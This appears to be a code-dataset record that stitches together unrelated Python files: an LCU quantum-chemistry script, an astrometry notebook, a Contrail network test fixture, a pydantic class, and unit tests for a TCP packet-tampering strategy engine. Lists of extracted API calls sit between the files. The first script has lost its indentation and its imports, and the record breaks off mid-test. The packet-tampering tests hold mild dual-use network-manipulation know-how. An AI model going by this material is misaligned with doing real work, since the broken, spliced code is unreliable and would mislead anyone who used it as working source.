import quchem.Misc_functions.conversion_scripts as conv_scr
from copy import deepcopy
from quchem.Unitary_Partitioning.Unitary_partitioning_LCU_method import LCU_linalg_Energy
from openfermion import qubit_operator_sparse
import pickle
import datetime
#######
import sys
# working_dir = os.getcwd()
working_dir = os.path.dirname(os.path.abspath(__file__)) # gets directory where running python file is!
Analysis_dir = os.path.join(working_dir, 'Analysis')
full_H_results_dir = os.path.join(Analysis_dir, 'SeqRot_LCU_script_A_results')
print('start time: {}'.format(datetime.datetime.now().strftime('%Y%b%d-%H%M%S%f')))
print('working directory:', working_dir)
###### IMPORT INITIAL RESULTS
## import LCU results
myriad_LCU_results = {}
for filename in os.listdir(full_H_results_dir):
if (filename.endswith('.pickle') and filename.startswith('LCU_CS_VQE_exp')):
file_path = os.path.join(full_H_results_dir, filename)
mol_name = filename[40:-8]
with open(file_path,'rb') as infile:
data = pickle.load(infile)
myriad_LCU_results[mol_name] = data
### find anti-commuting sets
unitary_paritioning_LCU={}
# optional params!
commutativity_flag = 'AC' ## <- defines relationship between sets!!!
Graph_colouring_strategy='largest_first'
check_reduction_LCU = False
######## take commandline arguement to run in parallel
mol_num = int(sys.argv[1])
sorted_mol_names = sorted(list(myriad_LCU_results.keys()))
mol_key = sorted_mol_names[mol_num-1] # UCL supercomputer indexes from 1, hence minus one here!
########
# for mol_key in tqdm(list(myriad_LCU_results.keys())): # removed loop and used myriad array input!
anti_commuting_sets_different_H_LCU_sizes={}
for ind_key in myriad_LCU_results[mol_key]:
if isinstance(ind_key, str):
continue
if ind_key==0:
# only non-contextual problem
anti_commuting_sets_different_H_LCU_sizes[ind_key]= {'AC_sets': {},
'E':myriad_LCU_results[mol_key][ind_key]['E']}
else:
### LCU
H_LCU_dict = myriad_LCU_results[mol_key][ind_key]['H']
H_LCU_pruned = {P_key: coeff.real for P_key, coeff in H_LCU_dict.items() if not np.isclose(coeff.real,0)}
H_LCU= conv_scr.Get_Openfermion_Hamiltonian(H_LCU_pruned)
n_qubits = len(list(H_LCU_dict.keys())[0])
anti_commuting_sets_LCU = Clique_cover_Hamiltonian(list(H_LCU),
n_qubits,
commutativity_flag,
Graph_colouring_strategy)
all_zero_Pn_index_dict = {set_key: 0 for set_key in anti_commuting_sets_LCU}
E_LCU = LCU_linalg_Energy(anti_commuting_sets_LCU,
all_zero_Pn_index_dict,
n_qubits,
atol=1e-8,
rtol=1e-05,
check_reduction=check_reduction_LCU)
anti_commuting_sets_different_H_LCU_sizes[ind_key]= {'AC_sets': anti_commuting_sets_LCU,
'E':E_LCU}
unitary_paritioning_LCU[mol_key]= deepcopy(anti_commuting_sets_different_H_LCU_sizes)
del anti_commuting_sets_different_H_LCU_sizes
####### SAVE OUTPUT details
unique_file_time = datetime.datetime.now().strftime('%Y%b%d-%H%M%S%f')
# output_dir = os.path.join(working_dir, 'Pickle_out')
output_dir = os.getcwd()
########
####### SAVE OUTPUT
file_name2 = 'Unitary_Partitinging_LCU_CS_VQE_LCU_exp__{}__{}_.pickle'.format(unique_file_time, mol_key)
file_out2=os.path.join(output_dir, file_name2)
with open(file_out2, 'wb') as outfile:
pickle.dump(unitary_paritioning_LCU, outfile)
print('pickle files dumped unqiue time id: {}'.format(unique_file_time))
print('end time: {}'.format(datetime.datetime.now().strftime('%Y%b%d-%H%M%S%f'))) | [
"os.listdir",
"pickle.dump",
"numpy.isclose",
"os.path.join",
"pickle.load",
"os.getcwd",
"quchem.Unitary_Partitioning.Unitary_partitioning_LCU_method.LCU_linalg_Energy",
"quchem.Misc_functions.conversion_scripts.Get_Openfermion_Hamiltonian",
"datetime.datetime.now",
"copy.deepcopy",
"os.path.ab... | [((554, 591), 'os.path.join', 'os.path.join', (['working_dir', '"""Analysis"""'], {}), "(working_dir, 'Analysis')\n", (566, 591), False, 'import os\n'), ((613, 670), 'os.path.join', 'os.path.join', (['Analysis_dir', '"""SeqRot_LCU_script_A_results"""'], {}), "(Analysis_dir, 'SeqRot_LCU_script_A_results')\n", (625, 670), False, 'import os\n'), ((894, 924), 'os.listdir', 'os.listdir', (['full_H_results_dir'], {}), '(full_H_results_dir)\n', (904, 924), False, 'import os\n'), ((3341, 3392), 'copy.deepcopy', 'deepcopy', (['anti_commuting_sets_different_H_LCU_sizes'], {}), '(anti_commuting_sets_different_H_LCU_sizes)\n', (3349, 3392), False, 'from copy import deepcopy\n'), ((3608, 3619), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3617, 3619), False, 'import os\n'), ((3766, 3802), 'os.path.join', 'os.path.join', (['output_dir', 'file_name2'], {}), '(output_dir, file_name2)\n', (3778, 3802), False, 'import os\n'), ((465, 490), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (480, 490), False, 'import os\n'), ((3847, 3892), 'pickle.dump', 'pickle.dump', (['unitary_paritioning_LCU', 'outfile'], {}), '(unitary_paritioning_LCU, outfile)\n', (3858, 3892), False, 'import pickle\n'), ((1027, 1069), 'os.path.join', 'os.path.join', (['full_H_results_dir', 'filename'], {}), '(full_H_results_dir, filename)\n', (1039, 1069), False, 'import os\n'), ((2421, 2471), 'quchem.Misc_functions.conversion_scripts.Get_Openfermion_Hamiltonian', 'conv_scr.Get_Openfermion_Hamiltonian', (['H_LCU_pruned'], {}), '(H_LCU_pruned)\n', (2457, 2471), True, 'import quchem.Misc_functions.conversion_scripts as conv_scr\n'), ((2925, 3066), 'quchem.Unitary_Partitioning.Unitary_partitioning_LCU_method.LCU_linalg_Energy', 'LCU_linalg_Energy', (['anti_commuting_sets_LCU', 'all_zero_Pn_index_dict', 'n_qubits'], {'atol': '(1e-08)', 'rtol': '(1e-05)', 'check_reduction': 'check_reduction_LCU'}), '(anti_commuting_sets_LCU, all_zero_Pn_index_dict, n_qubits,\n atol=1e-08, rtol=1e-05, check_reduction=check_reduction_LCU)\n', (2942, 3066), False, 'from quchem.Unitary_Partitioning.Unitary_partitioning_LCU_method import LCU_linalg_Energy\n'), ((3488, 3511), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3509, 3511), False, 'import datetime\n'), ((1170, 1189), 'pickle.load', 'pickle.load', (['infile'], {}), '(infile)\n', (1181, 1189), False, 'import pickle\n'), ((703, 726), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (724, 726), False, 'import datetime\n'), ((3997, 4020), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4018, 4020), False, 'import datetime\n'), ((2371, 2396), 'numpy.isclose', 'np.isclose', (['coeff.real', '(0)'], {}), '(coeff.real, 0)\n', (2381, 2396), True, 'import numpy as np\n')] |
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.13.0
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # PN Ou 5: Inspect original files
from pathlib import Path
from astropy.io import fits
from astropy.table import Table
dpath = Path("../data/originals/")
# Look and see what sort of files we have:
data = []
kwds = ["MEZMODE", "DATE-OBS", "FILTER", "RA", "DEC", "PA", "CCDTYPE", "CCDSUM"]
for _file in sorted(dpath.glob("*.fits")):
hdu = fits.open(_file)[0]
thisdata = {"File": _file.stem}
for k in kwds:
thisdata[k] = hdu.header.get(k)
data.append(thisdata)
tab = Table(rows=data)
tab.show_in_notebook()
# So we have 2017 data with 70 micron slit and 2x2 binning, and then 2018, 2019 data with 150 micron slit and 3x3 binning.
# Select the image+slit or slit+image files that we will need to do astrometry of
m = ["slit" in _ for _ in tab["MEZMODE"]]
tab[m]
# Write out a list of all the Image+slit files
listfile = dpath.parent / "image-list.dat"
listfile.write_text("\n".join(tab[m]["File"]))
listfile
# Check that it worked:
listfile.read_text().splitlines()
# ## Find the HEALpix coordinates of our source
from astropy.coordinates import SkyCoord, ICRS
import astropy.units as u
# All the positions should be about the same, so we just use the first one.
c = SkyCoord(tab[0]["RA"], tab[0]["DEC"], unit=(u.hourangle, u.deg))
c
from astropy_healpix import HEALPix
# In order to find which data files to download from http://data.astrometry.net/5000/, we need to translate the celestial coordinate to HEALpix index numbers:
hp_2 = HEALPix(nside=2, order="nested", frame=ICRS())
hp_1 = HEALPix(nside=1, order="nested", frame=ICRS())
# Levels 0 to 4 use the `nside=2` tiles.
hp_2.cone_search_skycoord(c, radius=5 * u.arcminute)
# So that means `index500[0-4]-13.fits`
hp_1.cone_search_skycoord(c, radius=5 * u.arcminute)
# So that means `index500[5-7]-03.fits`
# + tags=[]
hp_2.cone_search_lonlat(300 * u.deg, 50 * u.deg, 0.1 * u.deg)
# -
# ## Look at the HEALpix data files
#
# Something isn't right. I got the 13 series but the program complains that the coordinates are not contained in the tile.
hdulist = fits.open(dpath.parent / "astrometry-net" / "index-5004-13.fits")
hdulist.info()
# Looks like HDU 13 has the original table of stars:
hdulist[13].header
tstars = Table.read(hdulist[13])
df = tstars.to_pandas()
df[["ra", "dec"]].describe()
# So no wonder that is not working. I want (318.6, 43.7) but this has an RA range of 270 to 315
tstars2 = Table.read(fits.open(dpath.parent / "astrometry-net" / "index-5004-14.fits")[13])
df2 = tstars2.to_pandas()
df2[["ra", "dec"]].describe()
# So, it turns out that tile 14 is what I needed, not 13.
| [
"astropy.coordinates.ICRS",
"astropy.table.Table",
"pathlib.Path",
"astropy.coordinates.SkyCoord",
"astropy.io.fits.open",
"astropy.table.Table.read"
] | [((439, 465), 'pathlib.Path', 'Path', (['"""../data/originals/"""'], {}), "('../data/originals/')\n", (443, 465), False, 'from pathlib import Path\n'), ((802, 818), 'astropy.table.Table', 'Table', ([], {'rows': 'data'}), '(rows=data)\n', (807, 818), False, 'from astropy.table import Table\n'), ((1512, 1576), 'astropy.coordinates.SkyCoord', 'SkyCoord', (["tab[0]['RA']", "tab[0]['DEC']"], {'unit': '(u.hourangle, u.deg)'}), "(tab[0]['RA'], tab[0]['DEC'], unit=(u.hourangle, u.deg))\n", (1520, 1576), False, 'from astropy.coordinates import SkyCoord, ICRS\n'), ((2371, 2436), 'astropy.io.fits.open', 'fits.open', (["(dpath.parent / 'astrometry-net' / 'index-5004-13.fits')"], {}), "(dpath.parent / 'astrometry-net' / 'index-5004-13.fits')\n", (2380, 2436), False, 'from astropy.io import fits\n'), ((2536, 2559), 'astropy.table.Table.read', 'Table.read', (['hdulist[13]'], {}), '(hdulist[13])\n', (2546, 2559), False, 'from astropy.table import Table\n'), ((655, 671), 'astropy.io.fits.open', 'fits.open', (['_file'], {}), '(_file)\n', (664, 671), False, 'from astropy.io import fits\n'), ((1823, 1829), 'astropy.coordinates.ICRS', 'ICRS', ([], {}), '()\n', (1827, 1829), False, 'from astropy.coordinates import SkyCoord, ICRS\n'), ((1877, 1883), 'astropy.coordinates.ICRS', 'ICRS', ([], {}), '()\n', (1881, 1883), False, 'from astropy.coordinates import SkyCoord, ICRS\n'), ((2735, 2800), 'astropy.io.fits.open', 'fits.open', (["(dpath.parent / 'astrometry-net' / 'index-5004-14.fits')"], {}), "(dpath.parent / 'astrometry-net' / 'index-5004-14.fits')\n", (2744, 2800), False, 'from astropy.io import fits\n')] |
import project_test
from common.contrail_test_init import ContrailTestInit
from common.connections import ContrailConnections
import os
import fixtures
from test import BaseTestCase
import time
from floating_ip import *
from vn_test import *
from control_node import *
from common import isolated_creds
from tcutils.util import Singleton
class PublicVn(fixtures.Fixture):
__metaclass__ = Singleton
def __init__(self, isolated_creds_obj, inputs, ini_file = None ,logger = None, mx_rt = None):
self.isolated_creds = isolated_creds_obj
self.username = self.isolated_creds.username
self.password = self.isolated_creds.password
self.inputs = inputs
self.ini_file = ini_file
self.logger = logger
self.public_vn = self.inputs.public_vn
self.public_tenant = self.inputs.admin_tenant
self.setUp()
self.create_public_vn(mx_rt)
self.create_floatingip_pool()
self.configure_control_nodes()
def setUp(self):
super(PublicVn, self).setUp()
self.project = self.isolated_creds.create_tenant(self.public_tenant)
self.inputs = self.isolated_creds.get_inputs(self.project)
self.connections = self.isolated_creds.get_connections(self.inputs)
if self.isolated_creds.__class__.__name__ == 'AdminIsolatedCreds':
# If AdminIsolatedCreds, one could add user to tenant
# Else, it is assumed that the administrator has taken
# care
self.isolated_creds.create_and_attach_user_to_tenant(
self.project,
self.username,
self.password)
self.project.set_sec_group_for_allow_all(\
self.public_tenant, 'default')
# end setUp
def create_public_vn(self,mx_rt = None):
if (('MX_GW_TEST' in os.environ) and (
os.environ.get('MX_GW_TEST') == '1')):
fip_pool_name = self.inputs.fip_pool_name
fvn_name = self.public_vn
fip_subnets = [self.inputs.fip_pool]
if not mx_rt:
mx_rt = self.inputs.mx_rt
self.public_vn_fixture = self.useFixture(
VNFixture(
project_name=self.project.project_name,
connections=self.connections,
vn_name=fvn_name,
inputs=self.inputs,
subnets=fip_subnets,
router_asn=self.inputs.router_asn,
rt_number=mx_rt,
router_external=True))
assert self.public_vn_fixture.verify_on_setup()
self.logger.info('created public VN:%s' % fvn_name)
# end createPublicVN
def create_floatingip_pool(self):
if (('MX_GW_TEST' in os.environ) and (
os.environ.get('MX_GW_TEST') == '1')):
fip_pool_name = self.inputs.fip_pool_name
fvn_name = self.public_vn
fip_subnets = [self.inputs.fip_pool]
self.fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.public_tenant,
inputs=self.inputs,
connections=self.connections,
pool_name=fip_pool_name,
vn_id=self.public_vn_fixture.vn_id,
option='neutron',
vn_name=fvn_name))
assert self.fip_fixture.verify_on_setup()
self.logger.info('created FIP Pool:%s under Project:%s' %
(self.fip_fixture.pool_name,
self.project.project_name))
# end createfloatingip
def configure_control_nodes(self):
# Configuring all control nodes here
if (('MX_GW_TEST' in os.environ) and (
os.environ.get('MX_GW_TEST') == '1')):
router_name = self.inputs.ext_routers[0][0]
router_ip = self.inputs.ext_routers[0][1]
for entry in self.inputs.bgp_ips:
hostname = self.inputs.host_data[entry]['name']
entry_control_ip = self.inputs.host_data[
entry]['host_control_ip']
cn_fixture1 = self.useFixture(
CNFixture(
connections=self.connections,
router_name=hostname,
router_ip=entry_control_ip,
router_type='contrail',
inputs=self.inputs))
cn_fixturemx = self.useFixture(
CNFixture(
connections=self.connections,
router_name=router_name,
router_ip=router_ip,
router_type='mx',
inputs=self.inputs))
sleep(10)
assert cn_fixturemx.verify_on_setup()
# TODO Configure MX. Doing Manually For Now
| [
"os.environ.get"
] | [((1886, 1914), 'os.environ.get', 'os.environ.get', (['"""MX_GW_TEST"""'], {}), "('MX_GW_TEST')\n", (1900, 1914), False, 'import os\n'), ((2830, 2858), 'os.environ.get', 'os.environ.get', (['"""MX_GW_TEST"""'], {}), "('MX_GW_TEST')\n", (2844, 2858), False, 'import os\n'), ((3829, 3857), 'os.environ.get', 'os.environ.get', (['"""MX_GW_TEST"""'], {}), "('MX_GW_TEST')\n", (3843, 3857), False, 'import os\n')] |
# =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
from pydantic import Field
from ..base_object import BaseObject
class GetVoiceChatAvailableParticipants(BaseObject):
"""
Returns list of participant identifiers, which can be used to join voice chats in a chat
:param chat_id: Chat identifier
:type chat_id: :class:`int`
"""
ID: str = Field("getVoiceChatAvailableParticipants", alias="@type")
chat_id: int
@staticmethod
def read(q: dict) -> GetVoiceChatAvailableParticipants:
return GetVoiceChatAvailableParticipants.construct(**q)
| [
"pydantic.Field"
] | [((778, 835), 'pydantic.Field', 'Field', (['"""getVoiceChatAvailableParticipants"""'], {'alias': '"""@type"""'}), "('getVoiceChatAvailableParticipants', alias='@type')\n", (783, 835), False, 'from pydantic import Field\n')] |
import logging
import os
from scapy.all import IP, TCP
import actions.tree
import actions.drop
import actions.tamper
import actions.duplicate
import actions.utils
import layers.packet
def test_init():
"""
Tests initialization
"""
print(actions.action.Action.get_actions("out"))
def test_count_leaves():
"""
Tests leaf count is correct.
"""
a = actions.tree.ActionTree("out")
logger = logging.getLogger("test")
assert not a.parse("TCP:reserved:0tamper{TCP:flags:replace:S}-|", logger), "Tree parsed malformed DNA"
a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
assert a.count_leaves() == 1
assert a.remove_one()
a.add_action(duplicate)
assert a.count_leaves() == 1
duplicate.left = duplicate2
assert a.count_leaves() == 1
duplicate.right = drop
assert a.count_leaves() == 2
def test_check():
"""
Tests action tree check function.
"""
a = actions.tree.ActionTree("out")
logger = logging.getLogger("test")
a.parse("[TCP:flags:RA]-tamper{TCP:flags:replace:S}-|", logger)
p = layers.packet.Packet(IP()/TCP(flags="A"))
assert not a.check(p, logger)
p = layers.packet.Packet(IP(ttl=64)/TCP(flags="RA"))
assert a.check(p, logger)
assert a.remove_one()
assert a.check(p, logger)
a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
assert a.check(p, logger)
a.parse("[IP:ttl:64]-tamper{TCP:flags:replace:S}-|", logger)
assert a.check(p, logger)
p = layers.packet.Packet(IP(ttl=15)/TCP(flags="RA"))
assert not a.check(p, logger)
def test_scapy():
"""
Tests misc. scapy aspects relevant to strategies.
"""
a = actions.tree.ActionTree("out")
logger = logging.getLogger("test")
a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
p = layers.packet.Packet(IP()/TCP(flags="A"))
assert a.check(p, logger)
packets = a.run(p, logger)
assert packets[0][TCP].flags == "S"
p = layers.packet.Packet(IP()/TCP(flags="A"))
assert a.check(p, logger)
a.parse("[TCP:reserved:0]-tamper{TCP:chksum:corrupt}-|", logger)
packets = a.run(p, logger)
assert packets[0][TCP].chksum
assert a.check(p, logger)
def test_str():
"""
Tests string representation.
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
assert str(a).strip() == "[%s]-|" % str(t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
assert a.add_action(tamper)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}-|"
# Tree will not add a duplicate action
assert not a.add_action(tamper)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}-|"
assert a.add_action(tamper2)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},)-|"
assert a.add_action(actions.duplicate.DuplicateAction())
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
drop = actions.drop.DropAction()
assert a.add_action(drop)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate(drop,),),)-|" or \
str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate(,drop),),)-|"
assert a.remove_action(drop)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
# Cannot remove action that is not present
assert not a.remove_action(drop)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
a = actions.tree.ActionTree("out", trigger=t)
orig = "[TCP:urgptr:15963]-duplicate(,drop)-|"
a.parse(orig, logger)
assert a.remove_one()
assert orig != str(a)
assert str(a) in ["[TCP:urgptr:15963]-drop-|", "[TCP:urgptr:15963]-duplicate-|"]
def test_pretty_print_send():
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
duplicate = actions.duplicate.DuplicateAction()
a.add_action(duplicate)
correct_string = "TCP:flags:0\nduplicate\n├── ===> \n└── ===> "
assert a.pretty_print() == correct_string
def test_pretty_print(logger):
"""
Print complex tree, although difficult to test
"""
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
duplicate3 = actions.duplicate.DuplicateAction()
duplicate4 = actions.duplicate.DuplicateAction()
duplicate5 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
drop2 = actions.drop.DropAction()
drop3 = actions.drop.DropAction()
drop4 = actions.drop.DropAction()
duplicate.left = duplicate2
duplicate.right = duplicate3
duplicate2.left = tamper
duplicate2.right = drop
duplicate3.left = duplicate4
duplicate3.right = drop2
duplicate4.left = duplicate5
duplicate4.right = drop3
duplicate5.left = drop4
duplicate5.right = tamper2
a.add_action(duplicate)
correct_string = "TCP:flags:0\nduplicate\n├── duplicate\n│ ├── tamper{TCP:flags:replace:S}\n│ │ └── ===> \n│ └── drop\n└── duplicate\n ├── duplicate\n │ ├── duplicate\n │ │ ├── drop\n │ │ └── tamper{TCP:flags:replace:R}\n │ │ └── ===> \n │ └── drop\n └── drop"
assert a.pretty_print() == correct_string
assert a.pretty_print(visual=True)
assert os.path.exists("tree.png")
os.remove("tree.png")
a.parse("[TCP:flags:0]-|", logger)
a.pretty_print(visual=True) # Empty action tree
assert not os.path.exists("tree.png")
def test_pretty_print_order():
"""
Tests the left/right ordering by reading in a new tree
"""
logger = logging.getLogger("test")
a = actions.tree.ActionTree("out")
assert a.parse("[TCP:flags:A]-duplicate(tamper{TCP:flags:replace:R}(tamper{TCP:chksum:replace:14239},),duplicate(tamper{TCP:flags:replace:S}(tamper{TCP:chksum:replace:14239},),))-|", logger)
correct_pretty_print = "TCP:flags:A\nduplicate\n├── tamper{TCP:flags:replace:R}\n│ └── tamper{TCP:chksum:replace:14239}\n│ └── ===> \n└── duplicate\n ├── tamper{TCP:flags:replace:S}\n │ └── tamper{TCP:chksum:replace:14239}\n │ └── ===> \n └── ===> "
assert a.pretty_print() == correct_pretty_print
def test_parse():
"""
Tests string parsing.
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
base_t = actions.trigger.Trigger("field", "flags", "TCP")
base_a = actions.tree.ActionTree("out", trigger=base_t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper4 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
a.parse("[TCP:flags:0]-|", logger)
assert str(a) == str(base_a)
assert len(a) == 0
base_a.add_action(tamper)
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}-|", logger)
assert str(a) == str(base_a)
assert len(a) == 1
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},)-|", logging.getLogger("test"))
base_a.add_action(tamper2)
assert str(a) == str(base_a)
assert len(a) == 2
base_a.add_action(tamper3)
base_a.add_action(tamper4)
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},),),)-|", logging.getLogger("test"))
assert str(a) == str(base_a)
assert len(a) == 4
base_t = actions.trigger.Trigger("field", "flags", "TCP")
base_a = actions.tree.ActionTree("out", trigger=base_t)
duplicate = actions.duplicate.DuplicateAction()
assert a.parse("[TCP:flags:0]-duplicate-|", logger)
base_a.add_action(duplicate)
assert str(a) == str(base_a)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="A")
tamper4 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate.left = tamper
assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},)-|", logger)
assert str(a) == str(base_a)
duplicate.right = tamper2
assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R})-|", logger)
assert str(a) == str(base_a)
tamper2.left = tamper3
assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R}(tamper{TCP:flags:replace:A},))-|", logger)
assert str(a) == str(base_a)
strategy = actions.utils.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R})-| \/", logger)
assert strategy
assert len(strategy.out_actions[0]) == 3
assert len(strategy.in_actions) == 0
assert not a.parse("[]", logger) # No valid trigger
assert not a.parse("[TCP:flags:0]-", logger) # No valid ending "|"
assert not a.parse("[TCP:]-|", logger) # invalid trigger
assert not a.parse("[TCP:flags:0]-foo-|", logger) # Non-existent action
assert not a.parse("[TCP:flags:0]--|", logger) # Empty action
assert not a.parse("[TCP:flags:0]-duplicate(,,,)-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-duplicate()))-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-duplicate(((()-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-duplicate(,))))-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-drop(duplicate,)-|", logger) # Terminal action with children
assert not a.parse("[TCP:flags:0]-drop(duplicate,duplicate)-|", logger) # Terminal action with children
assert not a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(,duplicate)-|", logger) # Non-branching action with right child
assert not a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(drop,duplicate)-|", logger) # Non-branching action with children
def test_tree():
"""
Tests basic tree functionality.
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
duplicate = actions.duplicate.DuplicateAction()
a.add_action(None)
a.add_action(tamper)
assert a.get_slots() == 1
a.add_action(tamper2)
assert a.get_slots() == 1
a.add_action(duplicate)
assert a.get_slots() == 2
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
drop = actions.drop.DropAction()
a.add_action(drop)
assert a.get_slots() == 0
add_success = a.add_action(tamper)
assert not add_success
assert a.get_slots() == 0
rep = ""
for s in a.string_repr(a.action_root):
rep += s
assert rep == "drop"
print(str(a))
assert a.parse("[TCP:flags:A]-duplicate(tamper{TCP:seq:corrupt},)-|", logging.getLogger("test"))
for act in a:
print(str(a))
assert len(a) == 2
assert a.get_slots() == 2
for _ in range(100):
assert str(a.get_rand_action("out", request="DropAction")) == "drop"
def test_remove():
"""
Tests remove
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
tamper3 = actions.tamper.TamperAction()
assert not a.remove_action(tamper)
a.add_action(tamper)
assert a.remove_action(tamper)
a.add_action(tamper)
a.add_action(tamper2)
a.add_action(tamper3)
assert a.remove_action(tamper2)
assert tamper2 not in a
assert tamper.left == tamper3
assert not tamper.right
assert len(a) == 2
a = actions.tree.ActionTree("out", trigger=t)
duplicate = actions.duplicate.DuplicateAction()
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
tamper3 = actions.tamper.TamperAction()
a.add_action(tamper)
assert a.action_root == tamper
duplicate.left = tamper2
duplicate.right = tamper3
a.add_action(duplicate)
assert len(a) == 4
assert a.remove_action(duplicate)
assert duplicate not in a
assert tamper.left == tamper2
assert not tamper.right
assert len(a) == 2
a.parse("[TCP:flags:A]-|", logging.getLogger("test"))
assert not a.remove_one(), "Cannot remove one with no action root"
def test_len():
"""
Tests length calculation.
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
assert len(a) == 0, "__len__ returned wrong length"
a.add_action(tamper)
assert len(a) == 1, "__len__ returned wrong length"
a.add_action(tamper)
assert len(a) == 1, "__len__ returned wrong length"
a.add_action(tamper2)
assert len(a) == 2, "__len__ returned wrong length"
duplicate = actions.duplicate.DuplicateAction()
a.add_action(duplicate)
assert len(a) == 3, "__len__ returned wrong length"
def test_contains():
"""
Tests contains method
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
tamper3 = actions.tamper.TamperAction()
assert not a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper)
assert a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
add_success = a.add_action(tamper)
assert not add_success, "added duplicate action"
assert a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper2)
assert a.contains(tamper), "contains incorrect behavior"
assert a.contains(tamper2), "contains incorrect behavior"
a.remove_action(tamper2)
assert a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper2)
assert a.contains(tamper), "contains incorrect behavior"
assert a.contains(tamper2), "contains incorrect behavior"
remove_success = a.remove_action(tamper)
assert remove_success
assert not a.contains(tamper), "contains incorrect behavior"
assert a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper3)
assert a.contains(tamper3), "contains incorrect behavior"
assert len(a) == 2, "len incorrect return"
remove_success = a.remove_action(tamper2)
assert remove_success
